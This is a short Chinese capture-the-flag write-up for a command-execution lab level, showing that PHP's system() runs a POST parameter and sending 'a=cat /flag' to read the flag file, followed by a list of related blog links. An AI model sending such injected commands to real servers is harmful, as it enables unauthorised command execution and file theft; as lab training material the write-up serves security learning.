HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
m0_564264181 小时前
开源数据库E-R图绘制工具分享
数据库·经验分享·mysql·e-r图·开源工具
花海如潮淹2 小时前
API安全监测工具:数字经济的免疫哨兵
网络·经验分享·笔记·安全
TeleostNaCl3 小时前
在OpenWrt上使用udpxy同时实现在机顶盒和Potplayer等直播流软件观看IPTV直播的方法
网络·经验分享·电视盒子·智能电视·tv·电视
介一安全4 小时前
【Web安全】逻辑漏洞之URL跳转漏洞:原理、场景与防御
安全·web安全·安全威胁分析·安全性测试·逻辑漏洞·url跳转
希望奇迹很安静6 小时前
文件包含学习总结
安全·web安全·渗透测试学习
波吉爱睡觉6 小时前
文件解析漏洞大全
web安全·网络安全
八月的雨季 最後的冰吻6 小时前
php算法-- 关联数组使用,优化sip账号去重
开发语言·php
青藤云安全13 小时前
青藤天睿RASP再次发威!捕获E签宝RCE 0day漏洞
网络安全
rockmelodies15 小时前
【PHP安全】免费解密支持:zend52、zend53、zend54好工具
开发语言·安全·php
智者知已应修善业17 小时前
【C# 找最大值、最小值和平均值及大于个数和值】2022-9-23
经验分享·笔记·算法·c#